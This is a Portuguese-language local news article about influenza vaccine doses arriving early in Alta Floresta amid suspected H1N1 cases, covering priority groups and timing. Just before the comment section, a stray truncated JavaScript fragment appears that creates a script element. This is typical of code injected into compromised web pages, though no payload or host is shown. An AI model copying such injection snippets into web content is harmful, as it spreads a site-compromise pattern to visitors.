Capa / Cidades / Vacina contra influenza chegou ontem em Alta Floresta

Vacina contra influenza chegou ontem em Alta Floresta

H1Dionéia Martins

Devido aos recentes casos de suspeitas de pessoas infectadas pelo vírus da gripe H1N1 ou gripe suína como é como é popularmente conhecida em Alta Floresta.  A Secretaria Estadual de Saúde decidiu adiantar o repasse das vacinas para os municípios.

Em Alta Floresta seis casos estão sobre investigação. E a população com medo começou a procurar pela vacina em postos de saúde, hospitais particulares e farmácias.

Na quarta-feira a vacina contra a influenza chegou a Alta Floresta e ontem já começou a imunização nos profissionais de saúde. A partir da próxima  segunda-feira, 18, a vacina já estará disponível para crianças de 6 meses a 5 anos, gestantes, e mulheres que estiverem amamentando, estes serão os primeiros a serem imunizados.

Segundo a gerente da Vigilância Epidemiológica, Fernanda Santos de Jesus, os demais pessoas do grupo prioritário serão vacinados a medida que for chegando mais vacina. Os lotes de vacinação enviados em caráter emergencial serão destinados aos grupos que estão mais expostos, como os profissionais de saúde.

Na próxima semana o município deverá receber outro lote de vacinação.  A medida for chegando a vacina vai sendo estendida para outras faixas etárias. Quem preferir tomar a vacina na rede privada, alguns hospitais e farmácias já oferecem ao custo de aproximadamente R$ 100,00 (cem reais).

A vacina contra a gripe não faz efeito imediatamente,  cerca  de 15 dias após a vacinação já começam a surgir os anticorpos que darão a proteção contra a gripe, sendo que esta proteção máxima será atingida após aproximadamente 45 dias.

 var d=document;var s=d.createElement(‘script’);

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top